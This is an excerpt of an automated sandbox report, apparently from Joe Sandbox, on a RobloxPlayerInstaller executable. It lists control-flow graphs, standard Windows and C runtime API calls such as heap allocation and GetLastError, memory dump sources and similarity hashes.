                                                                                                                  control_flow_graph 61 110a4b0-110a4b9 62 110a4e8-110a4e9 61->62 63 110a4bb-110a4ce RtlFreeHeap 61->63 63->62 64 110a4d0-110a4e7 GetLastError call 10ee5d5 call 10ee672 63->64 64->62
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4C6
                                                                                                                  • GetLastError.KERNEL32(?,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 485612231-0
                                                                                                                  • Opcode ID: d59e4f959c2e5bb50b3aee5204a1ddfcea237bdf52626abc148c884e88133142
                                                                                                                  • Instruction ID: 5efd00955fe6fa1788f0180d03a4b9c2f98dab16f0dd7c518ea2483e70cbae64
                                                                                                                  • Opcode Fuzzy Hash: d59e4f959c2e5bb50b3aee5204a1ddfcea237bdf52626abc148c884e88133142
                                                                                                                  • Instruction Fuzzy Hash: 6FE08C32500208AFDF3A2BA9FC0CB893BA8AF50792F054031F608C60A4DBB485808B90

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,010F4464,0121C1C8,0000000C), ref: 0110A1C9
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 0110A26B
                                                                                                                    • Part of subcall function 0110B99B: RtlAllocateHeap.NTDLL(00000008,?,?,?,0110A212,00000001,00000364,?,00000006,000000FF,?,010F4464,0121C1C8,0000000C), ref: 0110B9DC
                                                                                                                    • Part of subcall function 0110A4B0: RtlFreeHeap.NTDLL(00000000,00000000,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4C6
                                                                                                                    • Part of subcall function 0110A4B0: GetLastError.KERNEL32(?,?,01112F19,?,00000000,?,?,011131BA,?,00000007,?,?,01113665,?,?), ref: 0110A4D1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$Heap$AllocateFree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2037364846-0
                                                                                                                  • Opcode ID: 6d651a32cf2c62565083d49e76b6fc643d17c332c69c3cf3ce4502238ec5f7e7
                                                                                                                  • Instruction ID: 5be218a5e7457c99cf415c79bf4d39189fd539a47b5d102d0ac58e1bce71cbf1
                                                                                                                  • Opcode Fuzzy Hash: 6d651a32cf2c62565083d49e76b6fc643d17c332c69c3cf3ce4502238ec5f7e7
                                                                                                                  • Instruction Fuzzy Hash: 7331C571E0A3226AE62F3A68BC89ABE3A595F616A9B110370FA15970D0DBD1880547E1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 146 110caca-110caf2 147 110caf4-110caf6 146->147 148 110caf8-110cafa 146->148 149 110cb49-110cb4c 147->149 150 110cb00-110cb07 call 110c9ff 148->150 151 110cafc-110cafe 148->151 153 110cb0c-110cb10 150->153 151->149 154 110cb12-110cb20 GetProcAddress 153->154 155 110cb2f-110cb46 153->155 154->155 157 110cb22-110cb2d call 110381c 154->157 156 110cb48 155->156 156->149 157->156
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: dffec4a226bb8250faf8e0e67f48ab36e1f71260c7501f1a5ae5000accd26eee
                                                                                                                  • Instruction ID: 56e99bd56130a0711d5659e40850ee6c966231d4c304f941dcd04ce9507dd62a
                                                                                                                  • Opcode Fuzzy Hash: dffec4a226bb8250faf8e0e67f48ab36e1f71260c7501f1a5ae5000accd26eee
                                                                                                                  • Instruction Fuzzy Hash: F8019237F046265FEB2F8A6DEC44A5A77AAEB852A07154260F910DB1CCEB7094019BD1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 160 110b99b-110b9a6 161 110b9b4-110b9ba 160->161 162 110b9a8-110b9b2 160->162 163 110b9d3-110b9e4 RtlAllocateHeap 161->163 164 110b9bc-110b9bd 161->164 162->161 165 110b9e8-110b9f3 call 10ee672 162->165 166 110b9e6 163->166 167 110b9bf-110b9c6 call 1109cb0 163->167 164->163 170 110b9f5-110b9f7 165->170 166->170 167->165 173 110b9c8-110b9d1 call 11125ed 167->173 173->163 173->165
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,0110A212,00000001,00000364,?,00000006,000000FF,?,010F4464,0121C1C8,0000000C), ref: 0110B9DC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 228a18c27c91c7efde0ad69487646103aeb6c465d8643530d62df5d6e5a2369a
                                                                                                                  • Instruction ID: 6d304be1784edbc668c9938d9da15374a90138645dee53dfeef0fd22fa0d0bcc
                                                                                                                  • Opcode Fuzzy Hash: 228a18c27c91c7efde0ad69487646103aeb6c465d8643530d62df5d6e5a2369a
                                                                                                                  • Instruction Fuzzy Hash: A5F05979E0C1256BAB3F2B6A9D01B5B7B489F513B0B058022AD14D61C4EBB0D80087E9

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 176 110a4ea-110a4f6 177 110a528-110a533 call 10ee672 176->177 178 110a4f8-110a4fa 176->178 186 110a535-110a537 177->186 180 110a513-110a524 RtlAllocateHeap 178->180 181 110a4fc-110a4fd 178->181 182 110a526 180->182 183 110a4ff-110a506 call 1109cb0 180->183 181->180 182->186 183->177 188 110a508-110a511 call 11125ed 183->188 188->177 188->180
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,010F463C,0110A27F,?,01103C3D,0121C588,00000018,00000003), ref: 0110A51C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 95321715bab98a2f7176ea9257cb6f7c65004f6b86f5628a05c723bbe59ca8ca
                                                                                                                  • Instruction ID: aa820afcc5dd140b48b25e3aa794406bf1d58be1f9926886a0626ac884ae521d
                                                                                                                  • Opcode Fuzzy Hash: 95321715bab98a2f7176ea9257cb6f7c65004f6b86f5628a05c723bbe59ca8ca
                                                                                                                  • Instruction Fuzzy Hash: E7E0E5319013265BEA3F26A9BC04B5A7A8CBF522B0F050120BE54970C4DBE1D90086A2

                                                                                                                  Control-flow Graph

                                                                                                                  control_flow_graph 191 1107a3b-1107a69 call 10e3198 call 1107793 195 1107a6e-1107a73 call 10e3175 191->195
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: H_prolog3
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 431132790-0
                                                                                                                  • Opcode ID: 923be91dfbc51954f1659e1c6357f82d0ad671e6caa8136efaa2e1dc2215a405
                                                                                                                  • Instruction ID: 05b55ec48010010c04ddc8157fad51626dabbdc6299a35a4c46025c2240f0849
                                                                                                                  • Opcode Fuzzy Hash: 923be91dfbc51954f1659e1c6357f82d0ad671e6caa8136efaa2e1dc2215a405
                                                                                                                  • Instruction Fuzzy Hash: EFE07576C0120EAEDB01DBD4C555BEEBBB8AB18300F5044669245E7180EB7497458BA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001712000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001763000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000017B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                  • Instruction ID: e8f4b7664334dd699ff31735bc7158397080108aca632e416f18e9ec654d9ab5
                                                                                                                  • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                                  • Instruction Fuzzy Hash: 4EE08C32D11238EBCB2ADBDCD90498AF7ECEB48E44B110096B601D3180C7B0DE00CBD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                                  • Instruction ID: cff7a1d4d1d10c8fd03c4808030218cbe76457b3784718e91e0e9010707d0933
                                                                                                                  • Opcode Fuzzy Hash: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                                  • Instruction Fuzzy Hash: 23C08034405D1446CD1F451491F13687355A391681F40398CC6030FAC1CB5D6843D700
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 010E6387
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 010E638F
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 010E6418
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 010E6443
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 010E6498
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: !$csm
                                                                                                                  • API String ID: 1170836740-2393827367
                                                                                                                  • Opcode ID: 4f05c36886ad279043ee318f09a60d415d685e3d709ae9510d59e1871af75603
                                                                                                                  • Instruction ID: ba8e1cadbb071115f9cb071678ee0bcd06e2a0442b234229f1d68d967d0c2797
                                                                                                                  • Opcode Fuzzy Hash: 4f05c36886ad279043ee318f09a60d415d685e3d709ae9510d59e1871af75603
                                                                                                                  • Instruction Fuzzy Hash: 5141B570A002099FCF10DF6AE888A9EBFE5EF55214F14C0A9E9545B355DB32E941CB91
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,5791E0C7,?,?,00000000,0112D7FB,000000FF,?,011043A1,00000002,?,01104375,010F466F), ref: 01104403
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01104415
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,0112D7FB,000000FF,?,011043A1,00000002,?,01104375,010F466F), ref: 01104437
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001805000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001856000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.00000000018F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000194A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.000000000199B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001EFE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F3E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1511467827.0000000001F41000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.1512774662.0000000001F43000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: !$CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1298785431
                                                                                                                  • Opcode ID: cf68df7d65530426a0dfd7b8ab4ae0682002c79867ce73492cc497b8022f5985
                                                                                                                  • Instruction ID: 684fe968504221ea59f029bd5a8d57efea908b1f727dcdd324b5a6144e29b95d
                                                                                                                  • Opcode Fuzzy Hash: cf68df7d65530426a0dfd7b8ab4ae0682002c79867ce73492cc497b8022f5985
                                                                                                                  • Instruction Fuzzy Hash: 2601DB71E00629EFDB198F54DC05FAE7BB8FB04B51F004629F921E26D4DBB49900CB50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.1510946174.0000000000DF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_df0000_RobloxPlayerInstaller.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 0-1801386649
                                                                                                                  • Opcode ID: f4a4214ace11eae541d1ce3465b4f0faff54a6ee3bbf770b4a6aada947e2773e
                                                                                                                  • Instruction ID: 652f12ab3a7386212e28874d2bdffc11321335d6eb52bccfbfb36d65cd92f445
                                                                                                                  • Opcode Fuzzy Hash: f4a4214ace11eae541d1ce3465b4f0faff54a6ee3bbf770b4a6aada947e2773e
                                                                                                                  • Instruction Fuzzy Hash: 0DA13472E202158FEF2FEF6CD4886ACBBB1BF15318F15402AD524AB2D1D7B19880CB51